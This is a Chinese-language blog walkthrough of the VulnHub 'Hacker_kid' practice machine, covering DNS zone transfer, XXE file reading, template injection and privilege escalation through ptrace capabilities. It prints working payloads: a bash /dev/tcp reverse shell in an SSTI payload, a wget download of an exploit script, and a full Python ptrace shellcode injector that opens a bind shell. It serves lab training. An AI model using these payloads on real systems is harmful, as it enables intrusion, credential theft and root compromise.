<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><title> VulnHub-7-Hacker_kid · Patrik's Blog</title><meta name="description" content="VulnHub-7-Hacker_kid - Patrik"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="icon" href="/favicon.png"><link rel="stylesheet" href="/css/apollo.css"><link rel="search" type="application/opensearchdescription+xml" href="http://example.com/atom.xml" title="Patrik's Blog"><meta name="generator" content="Hexo 6.1.0"><link rel="alternate" href="/atom.xml" title="Patrik's Blog" type="application/atom+xml">
</head><body><div class="wrap"><header><a href="/" class="logo-link"><img src="/favicon.png" alt="logo"></a><ul class="nav nav-list"><li class="nav-list-item"><a href="/" target="_self" class="nav-list-link">BLOG</a></li><li class="nav-list-item"><a href="/archives/" target="_self" class="nav-list-link">ARCHIVE</a></li><li class="nav-list-item"><a href="http://www.bing.com" target="_blank" class="nav-list-link">WEIBO</a></li><li class="nav-list-item"><a href="https://github.com/byesec" target="_blank" class="nav-list-link">GITHUB</a></li><li class="nav-list-item"><a href="/" target="_self" class="nav-list-link">RSS</a></li></ul></header><main class="container"><div class="post"><article class="post-block"><h1 class="post-title">VulnHub-7-Hacker_kid</h1><div class="post-info">2022年2月14日</div><div class="post-content"><blockquote>
<p><strong>靶机地址：</strong><a target="_blank" rel="noopener" href="https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova">https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova</a></p>
</blockquote>
<span id="more"></span>
<h2 id="一、信息收集"><a href="#一、信息收集" class="headerlink" title="一、信息收集"></a>一、信息收集</h2><h3 id="1-主机发现"><a href="#1-主机发现" class="headerlink" title="1.主机发现"></a>1.主机发现</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ifconfig #查看本机kali的IP地址 192.168.137.22</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230104424569.png" alt="image-20211230104424569"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo arp-scan -l</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230104521562.png" alt="image-20211230104521562"></p>
<p>发现目标主机192.168.137.244</p>
<h3 id="2-端口扫描"><a href="#2-端口扫描" class="headerlink" title="2.端口扫描"></a>2.端口扫描</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -p- 192.168.137.244 #扫描目标开放的端口</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230104655243.png" alt="image-20211230104655243"></p>
<h3 id="3-服务探测"><a href="#3-服务探测" class="headerlink" title="3.服务探测"></a>3.服务探测</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -p- -sV 192.168.137.244 #扫描端口服务信息</span><br></pre></td></tr></table></figure>



<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230104738596.png" alt="image-20211230104738596">从扫描结果来看，</p>
<p>53端口 domain域名服务（DNS）</p>
<p>80端口 Apache web服务</p>
<p>9999端口 Tornado(基于Python的轻量Web框架)</p>
<p>53端口是DNS域名解析使用的域名服务，通常会使用tcp和udp：</p>
<p>tcp的53端口一般用于同域内两台域名服务器之间的数据同步、交换</p>
<p>udp的53端口一般用于客户端向DNS服务器查询域名</p>
<p>由于<strong>nmap默认只扫描tcp端口</strong>，所以使用-sU参数扫描验证udp端口53</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -p53 -sU -sV 10.0.2.15</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230104932514.png" alt="image-20211230104932514"></p>
<p>确实开放了udp53端口</p>
<p>一台DNS服务器上可能包含多个DNS区域</p>
<p>尝试对ISC BIND 9.16.1搜索，发现有远程代码执行漏洞（CVE-20208625，CVE-202125216），但未找到exp</p>
<h2 id="二、漏洞发现"><a href="#二、漏洞发现" class="headerlink" title="二、漏洞发现"></a>二、漏洞发现</h2><h3 id="1-访问80端口"><a href="#1-访问80端口" class="headerlink" title="1.访问80端口"></a>1.访问80端口</h3><p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230105728056.png" alt="image-20211230105728056"></p>
<p>根据页面信息 像是一名小黑客的留言..</p>
<p>发现”More you will DIG me,more you will find me on your servers..DIG me more…DIG me more” 这句话</p>
<p>联想到Linux下的DNS管理中 存在DIG命令 </p>
<p>分别再对Start App Form三个链接进行点击 </p>
<p>Start：</p>
<p>在访问Start页面时的URL为：<a target="_blank" rel="noopener" href="http://192.168.137.244/index.html">http://192.168.137.244/index.html</a></p>
<p>尝试将index.html 更改后缀为 index.php</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230110654234.png" alt="image-20211230110654234"></p>
<p>发现页面正常解析为相同的主页–说明目标应该是用的PHP语言开发环境</p>
<p>App：</p>
<p>在访问Start页面时的URL为：<a target="_blank" rel="noopener" href="http://192.168.137.244/index.php#app.html">http://192.168.137.244/index.php#app.html</a></p>
<p>尝试访问：<a target="_blank" rel="noopener" href="http://192.168.137.244/app.html">http://192.168.137.244/app.html</a></p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230111419115.png" alt="image-20211230111419115"></p>
<p>发现一个类似于应用示例的界面，经过对页面的尝试后，也未发现直接可利用点。</p>
<p>App：</p>
<p>在访问Start页面时的URL为：<a target="_blank" rel="noopener" href="http://192.168.137.244/index.php#form.html">http://192.168.137.244/index.php#form.html</a></p>
<p>尝试访问：<a target="_blank" rel="noopener" href="http://192.168.137.244/form.html">http://192.168.137.244/form.html</a></p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230111727097.png" alt="image-20211230111727097"></p>
<p>仍未发现可直接利用的突破点。</p>
<p>将思路转回到首页页面的提示信息–DIG</p>
<p>但若想利用DIG命令 就必须知道相关的域名信息</p>
<p>查看源码，在注释内发现了信息</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230112257460.png" alt="image-20211230112257460"></p>
<p>在URL内构造</p>
<p><a target="_blank" rel="noopener" href="http://192.168.137.244/?page_no=2">http://192.168.137.244?page_no=2</a></p>
<p>并打开Burpsuite配置，进行截取，发送至Intruder</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230112700774.png" alt="image-20211230112700774"></p>
<p>对page_no&#x3D;x 处尝试爆破</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230112831248.png" alt="image-20211230112831248"></p>
<p>选择数字字典</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230113028498.png" alt="image-20211230113028498"></p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230113236472.png" alt="image-20211230113236472"></p>
<p>结果显示 似乎当page_no&#x3D;21时，页面会有不同的响应</p>
<p>访问<a target="_blank" rel="noopener" href="http://192.168.137.244/?page_no=21">http://192.168.137.244/?page_no=21</a></p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230113507952.png" alt="image-20211230113507952"></p>
<p>页面下方的信息提示：该小黑客为了方便自己可以随时连接该服务器，创建了一个子域，其中一个名为hackers.blackhat.local</p>
<h3 id="2-DNS区域传输"><a href="#2-DNS区域传输" class="headerlink" title="2.DNS区域传输"></a>2.DNS区域传输</h3><p>绑定hosts</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo vi /etc/hosts</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230114008595.png" alt="image-20211230114008595"></p>
<p>绑定完成后访问hackers.blackhat.local发现和直接用IP访问没有什么区别</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230114342113.png" alt="image-20211230114342113"></p>
<p>hackers.blackhat.local只是在blackhat.local DNS区域内的一条主机记录，那是否有更多的主机记录</p>
<p>所以尝试绑定一下hosts</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230114703747.png" alt="image-20211230114703747"></p>
<p>结合DIG 尝试对页面进行区域传输</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dig axfr @192.168.137.244 blackhat.local</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>axfr</code>发起axfr请求</p>
<p>axfr请求常用于主、从dns服务器之间同步数据.发送axfr请求后,主dns会把指定区域(顶级域)下的所有解析记录返回.</p>
<p>一般来说,axfr请求应仅限于主、备dns服务器之间,但是由于错误的配置导致任何人都可以获得指定区域下的所有解析记录.这种漏洞叫做<strong>DNS区域传输漏洞</strong></p>
<p><code>@192.168.137.244</code>用于指定dns服务器</p>
<p><code>blackhat.local</code>为顶级域名,也就是<strong>指定区域</strong></p>
<p>​                                                                                                  –by qiao</p>
</blockquote>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230115910294.png" alt="image-20211230115910294"></p>
<p>页面返回了目标DNS服务器的所有解析记录，说明存在DNS区域传输漏洞</p>
<p>将记录中一些特别的解析域名绑定添加到hosts内</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230120322543.png" alt="image-20211230120322543"></p>
<p>逐一访问后</p>
<p>发现hackerkid.blackhat.local 内有类似注册的页面</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230120519667.png" alt="image-20211230120519667"></p>
<h3 id="3-XXE注入"><a href="#3-XXE注入" class="headerlink" title="3.XXE注入"></a>3.XXE注入</h3><p>尝试对该页面提交数据 并抓取包 将其发送到Repeater页面</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230121207620.png" alt="image-20211230121207620"></p>
<p>发现该页面是一个xml文件，且提交会返回存在email标签内的内容，猜测email标签内为回显位，目标可能存在XXE漏洞</p>
<p>结合XXE漏洞，尝试读取&#x2F;etc&#x2F;passwd文件</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230121911283.png" alt="image-20211230121911283"></p>
<p>在读取到的信息中发现saket用户为可登录账号</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230122433994.png" alt="image-20211230122433994"></p>
<p>尝试读取&#x2F;home&#x2F;saket&#x2F;.bashrc    (&#x2F;bin&#x2F;bash的配置文件)</p>
<p>使用php封装器&#x2F;伪协议结合Base64编码读取：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php://filter/convert.base64-encode/resource=/home/saket/.bashrc</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230143019938.png" alt="image-20211230143019938"></p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230143225434.png" alt="image-20211230143225434"></p>
<p>解码后成功读取到用户名admin和密码Saket!#$%@!!</p>
<p>但是回忆之前的诸多页面中好像并不存在登录页面</p>
<p>仔细想想 9999端口还没有查看过</p>
<h3 id="4-访问9999端口"><a href="#4-访问9999端口" class="headerlink" title="4.访问9999端口"></a>4.访问9999端口</h3><p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230120716304.png" alt="image-20211230120716304"></p>
<p>又惊又喜 是一个登录页面 将刚才得到的账号密码输入</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230143542613.png" alt="image-20211230143542613"></p>
<p>结果显示报错</p>
<p>尝试使用saket作为用户名 密码不变</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230143658858.png" alt="image-20211230143658858"></p>
<p>登陆成功！页面提示需要知道我的名字 那么如何才能让他知道我的名字呢？ 尝试name参数提交名字！！！</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230143925201.png" alt="image-20211230143925201"></p>
<p>尝试几次后，发现其格式为“Hello 输入内容”，怀疑是否可能是模版注入呢？</p>
<h3 id="5-SSTI模板注入"><a href="#5-SSTI模板注入" class="headerlink" title="5.SSTI模板注入"></a>5.SSTI模板注入</h3><p>构造payload做测试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;1+abcxyz&#125;&#125;$&#123;1+abcxyz&#125;&lt;%1+abcxyz%&gt;[abcxyz]       #abcxyz处意为 无规则的、不应被开发者提前定义的函数名</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230175025746.png" alt="image-20211230175025746"></p>
<p>因不能运行解析abcxyz，页面返回了报错信息，可知其为python3.8的语言环境</p>
<p>再次构造payload测试是否可以执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$&#123;7*7&#125;&#123;&#123;7*7&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230175324680.png" alt="image-20211230175324680"></p>
<p>页面返回了执行<code>&#123;&#123;&#125;&#125;</code>内的语句信息</p>
<p>构造攻击反弹shell的payload:</p>
<p>kali：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -nvlp 4444</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% import os %&#125;&#123;&#123;os.system(&#x27;bash -c &quot;bash -i &gt;&amp; /dev/tcp/192.168.137.22/4444 0&gt;&amp;1&quot;&#x27;)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230180135061.png" alt="image-20211230180135061"></p>
<p>结果显示报错，并没有反弹shell</p>
<p>尝试将其进行URL编码再执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%7B%25%20import%20os%20%25%7D%7B%7Bos.system(&#x27;bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.137.22%2F4444%200%3E%261%22&#x27;)%7D%7D</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230180841637.png" alt="image-20211230180841637"></p>
<p>成功反弹shell</p>
<h2 id="三、提权"><a href="#三、提权" class="headerlink" title="三、提权"></a>三、提权</h2><p>当前用户只为普通用户，需提权至root</p>
<h3 id="1-常规提权"><a href="#1-常规提权" class="headerlink" title="1.常规提权"></a>1.常规提权</h3><p>尝试uname -a,sudo -l,suid三种方法都没能成功提权</p>
<h3 id="2-使用Capabilities提权"><a href="#2-使用Capabilities提权" class="headerlink" title="2.使用Capabilities提权"></a>2.使用Capabilities提权</h3><p>尝试使用Capabilities进行提权</p>
<p>Capabilities科普：</p>
<blockquote>
<p>capabilities 是linux2.2后出现的产物，它的出现一定程度上弥补了suid这种粗糙的权限管理机制，但是capabilities 自身也有造成提权的安全隐患</p>
</blockquote>
<p>构造语句：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getcap -r /     #递归查询根目录下设置了capabilities的可执行文件</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230182733872.png" alt="image-20211230182733872"></p>
<p>目标系统的环境变量未设置getcap</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/sbin/getcap -r / 2&gt;/dev/null     #过滤错误信息</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230183234783.png" alt="image-20211230183234783"></p>
<p>从查询到的信息中进行筛选，绝大多数大多是对网络数据包的查看，对提权没有帮助。</p>
<p>但值得注意的是，针对python2.7设置了cap_sys_ptrace+ep</p>
<blockquote>
<p>ptrace是一个系统调用，它提供了一种方法来让‘父’进程可以观察和控制其它进程的执行，检查和改变其核心映像以及寄存器。 主要用来实现断点调试和系统调用跟踪。</p>
<p>ptrace会在什么时候出现呢？在执行系统调用之前，内核会先检查当前进程是否处于被“跟踪”(traced)的状态。如果是的话，内核暂停当前进程并将控制权交给跟踪进程，使跟踪进程得以察看或者修改被跟踪进程的寄存器。</p>
<p>利用ptrace可以</p>
<ol>
<li>劫持另一个进程的系统调用，修改传入参数，返回值</li>
<li>向另一个进程注入代码，获得一个进程的eip,esp后，建立自己的栈空间，并使eip指向自己的代码</li>
</ol>
<p><a target="_blank" rel="noopener" href="https://onestraw.github.io/linux/ptrace-hack/">https://onestraw.github.io/linux/ptrace-hack/</a></p>
</blockquote>
<p>故可以尝试利用ptrace提权</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ps -U root 或 ps -aef | grep   #查看以root权限运行的进程信息</span><br></pre></td></tr></table></figure>



<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230185641921.png" alt="image-20211230185641921">下载使用注入脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cd /tmp    </span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget https://gist.githubusercontent.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py</span><br></pre></td></tr></table></figure>

<blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line">&gt;# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.</span><br><span class="line">&gt;# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c </span><br><span class="line"></span><br><span class="line">&gt;import ctypes</span><br><span class="line">&gt;import sys</span><br><span class="line">&gt;import struct</span><br><span class="line"></span><br><span class="line">&gt;# Macros defined in &lt;sys/ptrace.h&gt;</span><br><span class="line">&gt;# https://code.woboq.org/qt5/include/sys/ptrace.h.html</span><br><span class="line"></span><br><span class="line">&gt;PTRACE_POKETEXT   = 4</span><br><span class="line">&gt;PTRACE_GETREGS	= 12</span><br><span class="line">&gt;PTRACE_SETREGS	= 13</span><br><span class="line">&gt;PTRACE_ATTACH 	= 16</span><br><span class="line">&gt;PTRACE_DETACH 	= 17</span><br><span class="line"></span><br><span class="line">&gt;# Structure defined in &lt;sys/user.h&gt;</span><br><span class="line">&gt;# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct</span><br><span class="line"></span><br><span class="line">&gt;class user_regs_struct(ctypes.Structure):</span><br><span class="line">_fields_ = [</span><br><span class="line">   	(&quot;r15&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;r14&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;r13&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;r12&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;rbp&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;rbx&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;r11&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;r10&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;r9&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;r8&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;rax&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;rcx&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;rdx&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;rsi&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;rdi&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;orig_rax&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;rip&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;cs&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;eflags&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;rsp&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;ss&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;fs_base&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;gs_base&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;ds&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;es&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;fs&quot;, ctypes.c_ulonglong),</span><br><span class="line">   	(&quot;gs&quot;, ctypes.c_ulonglong),</span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">&gt;libc = ctypes.CDLL(&quot;libc.so.6&quot;)</span><br><span class="line"></span><br><span class="line">&gt;pid=int(sys.argv[1])</span><br><span class="line"></span><br><span class="line">&gt;# Define argument type and respone type.</span><br><span class="line">&gt;libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]</span><br><span class="line">&gt;libc.ptrace.restype = ctypes.c_uint64</span><br><span class="line"></span><br><span class="line">&gt;# Attach to the process</span><br><span class="line">&gt;libc.ptrace(PTRACE_ATTACH, pid, None, None)</span><br><span class="line">&gt;registers=user_regs_struct()</span><br><span class="line"></span><br><span class="line">&gt;# Retrieve the value stored in registers</span><br><span class="line">&gt;libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))</span><br><span class="line"></span><br><span class="line">&gt;print(&quot;Instruction Pointer: &quot; + hex(registers.rip))</span><br><span class="line"></span><br><span class="line">&gt;print(&quot;Injecting Shellcode at: &quot; + hex(registers.rip))</span><br><span class="line"></span><br><span class="line">&gt;# Shell code copied from exploit db.</span><br><span class="line">&gt;shellcode=&quot;\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05&quot;</span><br><span class="line"></span><br><span class="line">&gt;# Inject the shellcode into the running process byte by byte.</span><br><span class="line">&gt;for i in xrange(0,len(shellcode),4):</span><br><span class="line"></span><br><span class="line"> # Convert the byte to little endian.</span><br><span class="line"> shellcode_byte_int=int(shellcode[i:4+i].encode(&#x27;hex&#x27;),16)</span><br><span class="line"> shellcode_byte_little_endian=struct.pack(&quot;&lt;I&quot;, shellcode_byte_int).rstrip(&#x27;\x00&#x27;).encode(&#x27;hex&#x27;)</span><br><span class="line"> shellcode_byte=int(shellcode_byte_little_endian,16)</span><br><span class="line"></span><br><span class="line"> # Inject the byte.</span><br><span class="line"> libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)</span><br><span class="line"></span><br><span class="line">&gt;print(&quot;Shellcode Injected!!&quot;)</span><br><span class="line"></span><br><span class="line">&gt;# Modify the instuction pointer</span><br><span class="line">&gt;registers.rip=registers.rip+2</span><br><span class="line"></span><br><span class="line">&gt;# Set the registers</span><br><span class="line">&gt;libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))</span><br><span class="line"></span><br><span class="line">&gt;print(&quot;Final Instruction Pointer: &quot; + hex(registers.rip))</span><br><span class="line"></span><br><span class="line">&gt;# Detach from the process.</span><br><span class="line">&gt;libc.ptrace(PTRACE_DETACH, pid, None, None)</span><br></pre></td></tr></table></figure>

</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2.7 inject.py ID  #将后门写进进程，并在本地开启端口5600端口</span><br></pre></td></tr></table></figure>

<img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230191858784.png" alt="image-20211230191858784" style="zoom: 50%;" />

<p>查看5600端口是否开启：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ss -pantu | grep 5600</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230192016676.png" alt="image-20211230192016676">结果显示开启，则说明注入成功，后门进程端口已成功开放</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc 192.168.137.244 5600</span><br></pre></td></tr></table></figure>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211230192038184.png" alt="image-20211230192038184"></p>
<p>成功获取root权限</p>
</div></article></div></main><footer><div class="paginator"><a href="/2022/02/16/week8/" class="prev">上一篇</a><a href="/2022/01/14/week6/" class="next">下一篇</a></div><div class="copyright"><p>© 2021 - 2022 <a href="http://example.com">Patrik</a>, powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/pinggod/hexo-theme-apollo" target="_blank">hexo-theme-apollo</a>.</p></div></footer></div><script async src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js?config=TeX-MML-AM_CHTML" integrity="sha384-crwIf/BuaWM9rM65iM+dWFldgQ1Un8jWZMuh3puxb8TOY9+linwLoI7ZHZT+aekW" crossorigin="anonymous"></script></body></html>